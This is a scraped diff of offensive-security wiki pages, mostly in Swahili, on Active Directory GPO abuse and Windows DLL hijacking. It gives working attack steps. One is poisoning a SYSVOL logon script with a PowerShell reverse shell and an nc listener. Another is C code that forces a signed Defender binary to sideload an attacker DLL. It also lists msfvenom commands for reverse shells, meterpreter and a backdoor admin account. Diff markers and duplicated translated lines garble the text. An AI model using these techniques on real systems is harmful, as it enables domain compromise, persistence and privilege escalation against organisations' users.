		||||
 | 
			
		||||
Ukikagua Scheduled Tasks za GPO fulani, kama `Misconfigured Policy`, unaweza kuthibitisha kuongezwa kwa kazi kama `evilTask`. Kazi hizi zimeundwa kupitia scripts au zana za command-line zinazolenga kubadilisha tabia za mfumo au kuongeza uwezo wa kusimamisha haki.
 | 
			
		||||
Baada ya kukagua Scheduled Tasks kwa GPO fulani, kama `Misconfigured Policy`, kuongeza kwa kazi kama `evilTask` kunaweza kuthibitishwa. Kazi hizi zinaundwa kwa kutumia scripts au zana za command-line zinalenga kubadilisha tabia ya mfumo au kuongeza viwango vya ruhusa.
 | 
			
		||||
 | 
			
		||||
Muundo wa kazi, kama vile unaoonyeshwa katika faili ya usanidi ya XML iliyotengenezwa na `New-GPOImmediateTask`, unaelezea maelezo maalum ya kazi iliyopangwa - ikiwa ni pamoja na amri itakayotekelezwa na vichocheo vyake. Faili hii inaonyesha jinsi kazi zilizopangwa zinasainiwa na kusimamiwa ndani ya GPOs, ikitoa njia ya kutekeleza amri au scripts yoyote kama sehemu ya utekelezaji wa sera.
 | 
			
		||||
Muundo wa kazi, kama unaonyeshwa katika faili ya usanidi ya XML iliyotengenezwa na `New-GPOImmediateTask`, unaeleza maelezo maalum ya Scheduled Task - ikijumuisha amri itakayotekelezwa na triggers zake. Faili hili linaonyesha jinsi Scheduled Tasks zinavyofafanuliwa na kusimamiwa ndani ya GPOs, likitoa njia ya kutekeleza amri au scripts yoyote kama sehemu ya utekelezaji wa sera.
 | 
			
		||||
 | 
			
		||||
### Watumiaji na Vikundi
 | 
			
		||||
 | 
			
		||||
GPOs pia huruhusu udhibiti wa uanachama wa watumiaji na vikundi kwenye mifumo ya lengo. Kwa kuhariri faili za sera za Watumiaji na Vikundi moja kwa moja, wadukuzi wanaweza kuongeza watumiaji kwenye vikundi vyenye mamlaka, kama vile kundi la ndani la `administrators`. Hii inawezekana kupitia uteuzi wa ruhusa za usimamizi wa GPO, ambayo inaruhusu mabadiliko ya faili za sera ili kujumuisha watumiaji wapya au kubadilisha uanachama wa vikundi.
 | 
			
		||||
GPOs pia zinaruhusu kudhibiti uanachama wa watumiaji na vikundi kwenye mifumo ya lengo. Kwa kuhariri faili za sera za Users and Groups moja kwa moja, wahalifu wanaweza kuongeza watumiaji kwenye vikundi vyenye madaraka, kama vile kikundi cha ndani cha `administrators`. Hii inawezekana kupitia udelegeshaji wa ruhusa za usimamizi wa GPO, ambao unaruhusu mabadiliko ya faili za sera ili kujumuisha watumiaji wapya au kubadilisha uanachama wa vikundi.
 | 
			
		||||
 | 
			
		||||
Faili ya usanidi ya XML kwa Watumiaji na Vikundi inaelezea jinsi mabadiliko haya yanavyotekelezwa. Kwa kuongeza rekodi kwenye faili hii, watumiaji maalum wanaweza kupewa haki zilizoinuliwa kwa mifumo yote iliyohusishwa. Njia hii inatoa njia ya moja kwa moja ya kuinua hadhi kupitia uhariri wa GPO.
 | 
			
		||||
Faili ya usanidi ya XML ya Users and Groups inaeleza jinsi mabadiliko haya yanavyotekelezwa. Kwa kuongeza rekodi kwenye faili hili, watumiaji maalum wanaweza kupewa ruhusa za juu kwenye mifumo yote iliyohusishwa. Njia hii inatoa njia ya moja kwa moja ya kupandisha viwango vya ruhusa kupitia kuingiliwa kwa GPO.
 | 
			
		||||
 | 
			
		||||
Zaidi ya hayo, mbinu nyingine za kutekeleza msimbo au kudumisha udumishaji, kama vile kutumia logon/logoff scripts, kurekebisha registry keys kwa ajili ya autoruns, kusakinisha software kupitia .msi files, au kuhariri service configurations, pia zinaweza kuzingatiwa. Mbinu hizi zinatoa njia mbalimbali za kudumisha upatikanaji na kudhibiti mifumo ya lengo kupitia unyonyaji wa GPOs.
 | 
			
		||||
Zaidi ya hayo, mbinu nyingine za kutekeleza msimbo au kudumisha uwepo, kama vile kutumia logon/logoff scripts, kubadilisha registry keys kwa ajili ya autoruns, kusanidi software kupitia .msi files, au kuhariri configurations za service, pia zinaweza kuzingatiwa. Mbinu hizi zinatoa njia mbalimbali za kudumisha ufikiaji na kudhibiti mifumo ya lengo kupitia matumizi mabaya ya GPOs.
 | 
			
		||||
 | 
			
		||||
## Marejeo
 | 
			
		||||
## SYSVOL/NETLOGON Logon Script Poisoning
 | 
			
		||||
 | 
			
		||||
Writable paths under `\\<dc>\SYSVOL\<domain>\scripts\` or `\\<dc>\NETLOGON\` allow tampering with logon scripts executed at user logon via GPO. This yields code execution in the security context of logging users.
 | 
			
		||||
 | 
			
		||||
### Locate logon scripts
 | 
			
		||||
- Kagua sifa za watumiaji kwa logon script iliyosanidiwa:
 | 
			
		||||
```powershell
 | 
			
		||||
Get-DomainUser -Identity <user> -Properties scriptPath, scriptpath
 | 
			
		||||
```
 | 
			
		||||
- Pitia domain shares ili kuibua shortcuts au marejeo ya scripts:
 | 
			
		||||
```bash
 | 
			
		||||
# NetExec spider (authenticated)
 | 
			
		||||
netexec smb <dc_fqdn> -u <user> -p <pass> -M spider_plus
 | 
			
		||||
```
 | 
			
		||||
- Changanua faili za `.lnk` ili kutatua malengo yanayolenga ndani ya SYSVOL/NETLOGON (mbinu muhimu ya DFIR na kwa washambulizi wasiokuwa na ufikiaji wa moja kwa moja wa GPO):
 | 
			
		||||
```bash
 | 
			
		||||
# LnkParse3
 | 
			
		||||
lnkparse login.vbs.lnk
 | 
			
		||||
# Example target revealed:
 | 
			
		||||
# C:\Windows\SYSVOL\sysvol\<domain>\scripts\login.vbs
 | 
			
		||||
```
 | 
			
		||||
- BloodHound inaonyesha sifa ya `logonScript` (scriptPath) kwenye nodi za watumiaji inapopo.
 | 
			
		||||
 | 
			
		||||
### Thibitisha ufikiaji wa kuandika (usiamini orodha za share)
 | 
			
		||||
Vifaa vya kiotomatiki vinaweza kuonyesha SYSVOL/NETLOGON kama read-only, lakini ACL za NTFS zilizo chini zinaweza bado kuruhusu uandishi. Daima jaribu:
 | 
			
		||||
```bash
 | 
			
		||||
# Interactive write test
 | 
			
		||||
smbclient \\<dc>\SYSVOL -U <user>%<pass>
 | 
			
		||||
smb: \\> cd <domain>\scripts\
 | 
			
		||||
smb: \\<domain>\scripts\\> put smallfile.txt login.vbs   # check size/time change
 | 
			
		||||
```
 | 
			
		||||
Kama ukubwa wa faili au mtime inabadilika, una uwezo wa kuandika. Hifadhi nakala za awali kabla ya kuhariri.
 | 
			
		||||
 | 
			
		||||
### Sumisha script ya kuingia ya VBScript kwa RCE
 | 
			
		||||
Ongeza amri inayozindua PowerShell reverse shell (itengenezwe kutoka revshells.com) na uhifadhi mantiki ya asili ili kuepuka kuvunja kazi za biashara:
 | 
			
		||||
```vb
 | 
			
		||||
' At top of login.vbs
 | 
			
		||||
Set cmdshell = CreateObject("Wscript.Shell")
 | 
			
		||||
cmdshell.run "powershell -e <BASE64_PAYLOAD>"
 | 
			
		||||
 | 
			
		||||
' Existing mappings remain
 | 
			
		||||
MapNetworkShare "\\\\<dc_fqdn>\\apps", "V"
 | 
			
		||||
MapNetworkShare "\\\\<dc_fqdn>\\docs", "L"
 | 
			
		||||
```
 | 
			
		||||
Sikiliza kwenye mwenyeji wako na usubiri interactive logon ujao:
 | 
			
		||||
```bash
 | 
			
		||||
rlwrap -cAr nc -lnvp 443
 | 
			
		||||
```
 | 
			
		||||
Vidokezo:
 | 
			
		||||
- Utekelezaji hufanyika chini ya token ya mtumiaji aliyeingia (not SYSTEM). Wigo ni kiungo cha GPO (OU, site, domain) kinachotumika kutekeleza script hiyo.
 | 
			
		||||
- Fanya usafi kwa kurejesha yaliyomo/alama za wakati za awali baada ya matumizi.
 | 
			
		||||
 | 
			
		||||
## Marejeleo
 | 
			
		||||
 | 
			
		||||
- [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces)
 | 
			
		||||
- [https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges)
 | 
			
		||||
@ -189,5 +282,9 @@ Zaidi ya hayo, mbinu nyingine za kutekeleza msimbo au kudumisha udumishaji, kama
 | 
			
		||||
- [https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/)
 | 
			
		||||
- [https://adsecurity.org/?p=3658](https://adsecurity.org/?p=3658)
 | 
			
		||||
- [https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System_DirectoryServices_ActiveDirectoryAccessRule\_\_ctor_System_Security_Principal_IdentityReference_System_DirectoryServices_ActiveDirectoryRights_System_Security_AccessControl_AccessControlType\_](https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System_DirectoryServices_ActiveDirectoryAccessRule__ctor_System_Security_Principal_IdentityReference_System_DirectoryServices_ActiveDirectoryRights_System_Security_AccessControl_AccessControlType_)
 | 
			
		||||
- [https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System_DirectoryServices_ActiveDirectoryAccessRule__ctor_System_Security_Principal_IdentityReference_System_DirectoryServices_ActiveDirectoryRights_System_Security_AccessControl_AccessControlType_](https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System_DirectoryServices_ActiveDirectoryAccessRule__ctor_System_Security_Principal_IdentityReference_System_DirectoryServices_ActiveDirectoryRights_System_Security_AccessControl_AccessControlType_)
 | 
			
		||||
- [BloodyAD – AD attribute/UAC operations from Linux](https://github.com/CravateRouge/bloodyAD)
 | 
			
		||||
- [Samba – net rpc (group membership)](https://www.samba.org/)
 | 
			
		||||
- [HTB Puppy: AD ACL abuse, KeePassXC Argon2 cracking, and DPAPI decryption to DC admin](https://0xdf.gitlab.io/2025/09/27/htb-puppy.html)
 | 
			
		||||
 | 
			
		||||
{{#include ../../../banners/hacktricks-training.md}}
 | 
			
		||||
 | 
			
		||||
@ -1,320 +0,0 @@
 | 
			
		||||
# Dll Hijacking
 | 
			
		||||
 | 
			
		||||
{{#include ../../banners/hacktricks-training.md}}
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
## Taarifa za Msingi
 | 
			
		||||
 | 
			
		||||
DLL Hijacking inahusisha kumfanya programu inayotambulika ipakie DLL mbaya. Neno hili linajumuisha mbinu kadhaa kama **DLL Spoofing, Injection, and Side-Loading**. Inatumiwa sana kwa ajili ya utekelezaji wa msimbo, kupata persistence, na, kwa rari, kuinua vibali. Licha ya kuzingatia escalation hapa, mbinu ya hijacking inabaki ile ile kulingana na lengo.
 | 
			
		||||
 | 
			
		||||
### Mbinu za Kawaida
 | 
			
		||||
 | 
			
		||||
Kuna mbinu kadhaa zinazotumika kwa DLL hijacking, kila moja ikiwa na ufanisi wake kulingana na mkakati wa programu wa kupakia DLL:
 | 
			
		||||
 | 
			
		||||
1. **DLL Replacement**: Kubadilisha DLL halali na moja mbaya, kwa hiari kutumia DLL Proxying ili kuhifadhi utendaji wa DLL asili.
 | 
			
		||||
2. **DLL Search Order Hijacking**: Kuweka DLL mbaya katika njia ya utafutaji kabambe ya DLL halali, ukitumia muundo wa utafutaji wa programu.
 | 
			
		||||
3. **Phantom DLL Hijacking**: Kuunda DLL mbaya ambayo programu itahisi ni DLL iliyohitajika ambayo haipo.
 | 
			
		||||
4. **DLL Redirection**: Kurekebisha vigezo vya utafutaji kama %PATH% au faili .exe.manifest / .exe.local ili kuelekeza programu kwa DLL mbaya.
 | 
			
		||||
5. **WinSxS DLL Replacement**: Kubadilisha DLL halali na toleo mbaya katika direktorio ya WinSxS, mbinu inayohusishwa mara nyingi na DLL side-loading.
 | 
			
		||||
6. **Relative Path DLL Hijacking**: Kuweka DLL mbaya katika saraka inayodhibitiwa na mtumiaji pamoja na programu iliyo kopiwa, kufanana na mbinu za Binary Proxy Execution.
 | 
			
		||||
 | 
			
		||||
## Kupata Dll zilizokosekana
 | 
			
		||||
 | 
			
		||||
Njia ya kawaida ya kupata Dll zilizokosekana ndani ya mfumo ni kuendesha [procmon](https://docs.microsoft.com/en-us/sysinternals/downloads/procmon) kutoka sysinternals, **kuweka** **filter mbili zifuatazo**:
 | 
			
		||||
 | 
			
		||||
.png>)
 | 
			
		||||
 | 
			
		||||
.png>)
 | 
			
		||||
 | 
			
		||||
naonyesha tu **File System Activity**:
 | 
			
		||||
 | 
			
		||||
.png>)
 | 
			
		||||
 | 
			
		||||
Ikiwa unatafuta **dll zilizokosekana kwa ujumla** unaacha hii ikikimbia kwa **sekunde kadhaa**.\
 | 
			
		||||
Ikiwa unatafuta **dll iliyokosekana ndani ya executable maalumu** unapaswa kuweka **filter nyingine kama "Process Name" "contains" "\<exec name>", kuendesha executable, na kusitisha kurekodi matukio**.
 | 
			
		||||
 | 
			
		||||
## Kutumia Dll Zilizokosekana
 | 
			
		||||
 | 
			
		||||
Ili kuinua vibali, nafasi bora tunayo ni kuwa na uwezo wa **kuandika dll ambayo mchakato wenye vibali ataijaribu kupakia** katika moja ya **mahali ambapo itaangaliwa**. Kwa hiyo, tunaweza **kuandika** dll katika **folda** ambapo **dll inatafutwa kabla** ya folda ambapo **dll asili** iko (hali isiyo ya kawaida), au tunaweza kuandika kwenye folda fulani ambapo dll itatafutwa na dll asili haipo katika folda yoyote.
 | 
			
		||||
 | 
			
		||||
### Dll Search Order
 | 
			
		||||
 | 
			
		||||
**Ndani ya** [**Microsoft documentation**](https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order#factors-that-affect-searching) **unaweza kuona jinsi Dll zinavyopakuliwa kwa undani.**
 | 
			
		||||
 | 
			
		||||
Programu za Windows zinatafuta DLL kwa kufuata seti ya **njia za utafutaji zilizowekwa awali**, zikifuata mfuatano maalumu. Tatizo la DLL hijacking linapotokea ni pale ambapo DLL hatari imewekwa kimkakati katika moja ya saraka hizi, kuhakikisha inapakiwa kabla ya DLL halisi. Suluhisho la kuzuia hili ni kuhakikisha programu inatumia njia za absolute inaporejea kwa DLL zinazohitajika.
 | 
			
		||||
 | 
			
		||||
Unaweza kuona **mpangilio wa utafutaji wa DLL kwenye mifumo ya 32-bit** hapa chini:
 | 
			
		||||
 | 
			
		||||
1. The directory from which the application loaded.
 | 
			
		||||
2. The system directory. Use the [**GetSystemDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getsystemdirectorya) function to get the path of this directory.(_C:\Windows\System32_)
 | 
			
		||||
3. The 16-bit system directory. There is no function that obtains the path of this directory, but it is searched. (_C:\Windows\System_)
 | 
			
		||||
4. The Windows directory. Use the [**GetWindowsDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getwindowsdirectorya) function to get the path of this directory.
 | 
			
		||||
1. (_C:\Windows_)
 | 
			
		||||
5. The current directory.
 | 
			
		||||
6. The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the **App Paths** registry key. The **App Paths** key is not used when computing the DLL search path.
 | 
			
		||||
 | 
			
		||||
Hilo ndilo mpangilio wa **default** wa utafutaji ukiwa na **SafeDllSearchMode** imewezeshwa. Wakati imezimwa saraka ya sasa inasonga hadi nafasi ya pili. Ili kuzima kipengele hiki, tengeneza thamani ya rejista **HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager**\\**SafeDllSearchMode** na uite 0 (default ni enabled).
 | 
			
		||||
 | 
			
		||||
Ikiwa [**LoadLibraryEx**](https://docs.microsoft.com/en-us/windows/desktop/api/LibLoaderAPI/nf-libloaderapi-loadlibraryexa) inaitwa na **LOAD_WITH_ALTERED_SEARCH_PATH** utafutaji unaanza katika saraka ya module ya executable ambayo **LoadLibraryEx** inapakia.
 | 
			
		||||
 | 
			
		||||
Mwisho, kumbuka kwamba **dll inaweza kupakiwa ukionyesha njia kamili badala ya jina tu**. Katika kesi hiyo dll hiyo **itatafutwa tu katika njia hiyo** (ikiwa dll ina dependencies, zitatafutwa kama zilipakiwa kwa jina tu).
 | 
			
		||||
 | 
			
		||||
Kuna njia nyingine za kubadilisha mpangilio wa utafutaji lakini sitazielezea hapa.
 | 
			
		||||
 | 
			
		||||
### Forcing sideloading via RTL_USER_PROCESS_PARAMETERS.DllPath
 | 
			
		||||
 | 
			
		||||
Njia ya juu ya kuathiri kwa uhakika njia ya utafutaji ya DLL ya mchakato mpya iliyoundwa ni kuweka shamba DllPath katika RTL_USER_PROCESS_PARAMETERS wakati wa kuunda mchakato kwa kutumia native APIs za ntdll. Kwa kutoa saraka inayodhibitiwa na mwizi hapa, mchakato lengwa ambao unatambua DLL iliyoinuliwa kwa jina (bila njia kamili na bila kutumia flag za safe loading) unaweza kulazimishwa kupakia DLL mbaya kutoka saraka hiyo.
 | 
			
		||||
 | 
			
		||||
Wazo kuu
 | 
			
		||||
- Jenga vigezo vya mchakato na RtlCreateProcessParametersEx na toa DllPath maalumu inayofanya pointi kwa folda yako unayotawala (mfano, saraka ambako dropper/unpacker yako iko).
 | 
			
		||||
- Unda mchakato na RtlCreateUserProcess. Wakati binary lengwa itapotatua DLL kwa jina, loader itatafuta DllPath iliyotolewa wakati wa utatuzi, kuwezesha sideloading inayotegemewa hata pale DLL mbaya haiko pamoja na EXE lengwa.
 | 
			
		||||
 | 
			
		||||
Vidokezo / vikwazo
 | 
			
		||||
- Hii inaathiri mchakato mtoto unaoundwa; ni tofauti na SetDllDirectory, ambayo inaathiri mchakato wa sasa pekee.
 | 
			
		||||
- Lengwa lazima aimport au kutumia LoadLibrary kwa DLL kwa jina (bila njia kamili na bila kutumia LOAD_LIBRARY_SEARCH_SYSTEM32/SetDefaultDllDirectories).
 | 
			
		||||
- KnownDLLs na njia zilizo hardcoded absolute haziwezi kuibiwa. Forwarded exports na SxS zinaweza kubadilisha upendeleo.
 | 
			
		||||
 | 
			
		||||
Minimal C example (ntdll, wide strings, simplified error handling):
 | 
			
		||||
```c
 | 
			
		||||
#include <windows.h>
 | 
			
		||||
#include <winternl.h>
 | 
			
		||||
#pragma comment(lib, "ntdll.lib")
 | 
			
		||||
 | 
			
		||||
// Prototype (not in winternl.h in older SDKs)
 | 
			
		||||
typedef NTSTATUS (NTAPI *RtlCreateProcessParametersEx_t)(
 | 
			
		||||
PRTL_USER_PROCESS_PARAMETERS *pProcessParameters,
 | 
			
		||||
PUNICODE_STRING ImagePathName,
 | 
			
		||||
PUNICODE_STRING DllPath,
 | 
			
		||||
PUNICODE_STRING CurrentDirectory,
 | 
			
		||||
PUNICODE_STRING CommandLine,
 | 
			
		||||
PVOID Environment,
 | 
			
		||||
PUNICODE_STRING WindowTitle,
 | 
			
		||||
PUNICODE_STRING DesktopInfo,
 | 
			
		||||
PUNICODE_STRING ShellInfo,
 | 
			
		||||
PUNICODE_STRING RuntimeData,
 | 
			
		||||
ULONG Flags
 | 
			
		||||
);
 | 
			
		||||
 | 
			
		||||
typedef NTSTATUS (NTAPI *RtlCreateUserProcess_t)(
 | 
			
		||||
PUNICODE_STRING NtImagePathName,
 | 
			
		||||
ULONG Attributes,
 | 
			
		||||
PRTL_USER_PROCESS_PARAMETERS ProcessParameters,
 | 
			
		||||
PSECURITY_DESCRIPTOR ProcessSecurityDescriptor,
 | 
			
		||||
PSECURITY_DESCRIPTOR ThreadSecurityDescriptor,
 | 
			
		||||
HANDLE ParentProcess,
 | 
			
		||||
BOOLEAN InheritHandles,
 | 
			
		||||
HANDLE DebugPort,
 | 
			
		||||
HANDLE ExceptionPort,
 | 
			
		||||
PRTL_USER_PROCESS_INFORMATION ProcessInformation
 | 
			
		||||
);
 | 
			
		||||
 | 
			
		||||
static void DirFromModule(HMODULE h, wchar_t *out, DWORD cch) {
 | 
			
		||||
DWORD n = GetModuleFileNameW(h, out, cch);
 | 
			
		||||
for (DWORD i=n; i>0; --i) if (out[i-1] == L'\\') { out[i-1] = 0; break; }
 | 
			
		||||
}
 | 
			
		||||
 | 
			
		||||
int wmain(void) {
 | 
			
		||||
// Target Microsoft-signed, DLL-hijackable binary (example)
 | 
			
		||||
const wchar_t *image = L"\\??\\C:\\Program Files\\Windows Defender Advanced Threat Protection\\SenseSampleUploader.exe";
 | 
			
		||||
 | 
			
		||||
// Build custom DllPath = directory of our current module (e.g., the unpacked archive)
 | 
			
		||||
wchar_t dllDir[MAX_PATH];
 | 
			
		||||
DirFromModule(GetModuleHandleW(NULL), dllDir, MAX_PATH);
 | 
			
		||||
 | 
			
		||||
UNICODE_STRING uImage, uCmd, uDllPath, uCurDir;
 | 
			
		||||
RtlInitUnicodeString(&uImage, image);
 | 
			
		||||
RtlInitUnicodeString(&uCmd, L"\"C:\\Program Files\\Windows Defender Advanced Threat Protection\\SenseSampleUploader.exe\"");
 | 
			
		||||
RtlInitUnicodeString(&uDllPath, dllDir);      // Attacker-controlled directory
 | 
			
		||||
RtlInitUnicodeString(&uCurDir, dllDir);
 | 
			
		||||
 | 
			
		||||
RtlCreateProcessParametersEx_t pRtlCreateProcessParametersEx =
 | 
			
		||||
(RtlCreateProcessParametersEx_t)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlCreateProcessParametersEx");
 | 
			
		||||
RtlCreateUserProcess_t pRtlCreateUserProcess =
 | 
			
		||||
(RtlCreateUserProcess_t)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlCreateUserProcess");
 | 
			
		||||
 | 
			
		||||
RTL_USER_PROCESS_PARAMETERS *pp = NULL;
 | 
			
		||||
NTSTATUS st = pRtlCreateProcessParametersEx(&pp, &uImage, &uDllPath, &uCurDir, &uCmd,
 | 
			
		||||
NULL, NULL, NULL, NULL, NULL, 0);
 | 
			
		||||
if (st < 0) return 1;
 | 
			
		||||
 | 
			
		||||
RTL_USER_PROCESS_INFORMATION pi = {0};
 | 
			
		||||
st = pRtlCreateUserProcess(&uImage, 0, pp, NULL, NULL, NULL, FALSE, NULL, NULL, &pi);
 | 
			
		||||
if (st < 0) return 1;
 | 
			
		||||
 | 
			
		||||
// Resume main thread etc. if created suspended (not shown here)
 | 
			
		||||
return 0;
 | 
			
		||||
}
 | 
			
		||||
```
 | 
			
		||||
Operational usage example
 | 
			
		||||
- Place a malicious xmllite.dll (exporting the required functions or proxying to the real one) in your DllPath directory.
 | 
			
		||||
- Launch a signed binary known to look up xmllite.dll by name using the above technique. The loader resolves the import via the supplied DllPath and sideloads your DLL.
 | 
			
		||||
 | 
			
		||||
Mbinu hii imeonekana katika mazingira halisi kuendesha minyororo ya sideloading yenye hatua nyingi: launcher wa awali hutoa DLL msaidizi, ambayo kisha huanzisha binary iliyotiwa saini na Microsoft, inayoweza kuibiwa, yenye DllPath maalum ili kulazimisha kupakia DLL ya mshambuliaji kutoka kwenye saraka ya staging.
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
#### Isipokuwa katika mpangilio wa utafutaji wa DLL (kulingana na nyaraka za Windows)
 | 
			
		||||
 | 
			
		||||
Certain exceptions to the standard DLL search order are noted in Windows documentation:
 | 
			
		||||
 | 
			
		||||
- Wakati a **DLL that shares its name with one already loaded in memory** inapotokea, mfumo hupitisha utafutaji wa kawaida. Badala yake, hufanya ukaguzi wa redirection na manifest kabla ya kurudi kwenye DLL iliyopo kwenye memory. **In this scenario, the system does not conduct a search for the DLL**.
 | 
			
		||||
- Katika matukio ambapo DLL inatambulika kama **known DLL** kwa toleo la sasa la Windows, mfumo utatumia toleo lake la known DLL, pamoja na DLL zake zote zinazotegemea, **forgoing the search process**. Kifunguo cha rejista **HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs** linaorodhesha DLL hizi zinazojulikana.
 | 
			
		||||
- Iwapo **DLL ina dependencies**, utafutaji wa DLL hizi tegemezi unafanywa kana kwamba zilielezwa tu kwa **module names**, bila kujali kama DLL ya awali ilitambulishwa kwa njia kamili.
 | 
			
		||||
 | 
			
		||||
### Kupandisha Vibali
 | 
			
		||||
 | 
			
		||||
**Mahitaji**:
 | 
			
		||||
 | 
			
		||||
- Tambua mchakato unaofanya kazi au utakaoanzishwa chini ya **different privileges** (horizontal or lateral movement), ambao **lacking a DLL**.
 | 
			
		||||
- Hakikisha kuna **write access** kwa **directory** yoyote ambamo **DLL** itatafutwa. Mahali hapa inaweza kuwa saraka ya executable au saraka ndani ya system path.
 | 
			
		||||
 | 
			
		||||
Ndio, mahitaji ni magumu kuyapata kwa kuwa **by default it's kind of weird to find a privileged executable missing a dll** na ni hata **more weird to have write permissions on a system path folder** (kwa chaguo la kawaida hutaweza). Hata hivyo, katika mazingira yaliyoratibiwa vibaya hii inawezekana.\
 | 
			
		||||
Katika tukio una bahati na unapata kuwa unakidhi mahitaji, unaweza angalia mradi wa [UACME](https://github.com/hfiref0x/UACME). Hata kama **main goal of the project is bypass UAC**, unaweza kupata hapo **PoC** ya Dll hijaking kwa toleo la Windows ambayo unaweza kutumia (labda kwa kubadilisha njia ya folda ambapo una write permissions).
 | 
			
		||||
 | 
			
		||||
Note that you can **check your permissions in a folder** doing:
 | 
			
		||||
```bash
 | 
			
		||||
accesschk.exe -dqv "C:\Python27"
 | 
			
		||||
icacls "C:\Python27"
 | 
			
		||||
```
 | 
			
		||||
Na **angalia ruhusa za folda zote ndani ya PATH**:
 | 
			
		||||
```bash
 | 
			
		||||
for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )
 | 
			
		||||
```
 | 
			
		||||
Unaweza pia kuangalia imports za executable na exports za dll kwa:
 | 
			
		||||
```c
 | 
			
		||||
dumpbin /imports C:\path\Tools\putty\Putty.exe
 | 
			
		||||
dumpbin /export /path/file.dll
 | 
			
		||||
```
 | 
			
		||||
Kwa mwongozo kamili kuhusu jinsi ya **abuse Dll Hijacking to escalate privileges** with permissions to write in a **System Path folder** check:
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
{{#ref}}
 | 
			
		||||
dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
 | 
			
		||||
{{#endref}}
 | 
			
		||||
 | 
			
		||||
### Automated tools
 | 
			
		||||
 | 
			
		||||
[**Winpeas** ](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) itakagua ikiwa una ruhusa za kuandika kwenye folda yoyote ndani ya system PATH.\
 | 
			
		||||
Zana nyingine za kiotomatiki zinazovutia za kugundua udhaifu huu ni **PowerSploit functions**: _Find-ProcessDLLHijack_, _Find-PathDLLHijack_ and _Write-HijackDll._
 | 
			
		||||
 | 
			
		||||
### Example
 | 
			
		||||
 | 
			
		||||
Iwapo utapata senario inayoweza kutumiwa, moja ya mambo muhimu zaidi ili kui-exploit kwa mafanikio itakuwa **create a dll that exports at least all the functions the executable will import from it**. Hata hivyo, kumbuka kwamba Dll Hijacking inakuja muhimu ili [escalate from Medium Integrity level to High **(bypassing UAC)**](../authentication-credentials-uac-and-efs.md#uac) au kutoka[ **High Integrity to SYSTEM**](#from-high-integrity-to-system)**.** Unaweza kupata mfano wa **how to create a valid dll** ndani ya utafiti huu wa dll hijacking ulioangazia dll hijacking kwa execution: [**https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows**](https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows)**.**\
 | 
			
		||||
Zaidi ya hayo, katika **next sectio**n unaweza kupata baadhi ya **basic dll codes** ambazo zinaweza kuwa muhimu kama **templates** au kuunda **dll with non required functions exported**.
 | 
			
		||||
 | 
			
		||||
## **Creating and compiling Dlls**
 | 
			
		||||
 | 
			
		||||
### **Dll Proxifying**
 | 
			
		||||
 | 
			
		||||
Kwa msingi, **Dll proxy** ni Dll inayoweza **execute your malicious code when loaded** lakini pia **expose** na **work** kama **exected** kwa **relaying all the calls to the real library**.
 | 
			
		||||
 | 
			
		||||
Kwa kutumia zana [**DLLirant**](https://github.com/redteamsocietegenerale/DLLirant) or [**Spartacus**](https://github.com/Accenture/Spartacus) unaweza kwa kweli **indicate an executable and select the library** unayotaka ku-proxify na **generate a proxified dll** au **indicate the Dll** na **generate a proxified dll**.
 | 
			
		||||
 | 
			
		||||
### **Meterpreter**
 | 
			
		||||
 | 
			
		||||
**Get rev shell (x64):**
 | 
			
		||||
```bash
 | 
			
		||||
msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll -o msf.dll
 | 
			
		||||
```
 | 
			
		||||
**Pata meterpreter (x86):**
 | 
			
		||||
```bash
 | 
			
		||||
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll -o msf.dll
 | 
			
		||||
```
 | 
			
		||||
**Unda mtumiaji (x86 sikuwahi kuona toleo la x64):**
 | 
			
		||||
```
 | 
			
		||||
msfvenom -p windows/adduser USER=privesc PASS=Attacker@123 -f dll -o msf.dll
 | 
			
		||||
```
 | 
			
		||||
### Yako mwenyewe
 | 
			
		||||
 | 
			
		||||
Zingatia kwamba katika matukio kadhaa Dll unayo-compile lazima **export several functions** ambazo zitapakiwa na victim process; ikiwa hizi functions hazipo, **binary won't be able to load** them na **exploit will fail**.
 | 
			
		||||
```c
 | 
			
		||||
// Tested in Win10
 | 
			
		||||
// i686-w64-mingw32-g++ dll.c -lws2_32 -o srrstr.dll -shared
 | 
			
		||||
#include <windows.h>
 | 
			
		||||
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
 | 
			
		||||
switch(dwReason){
 | 
			
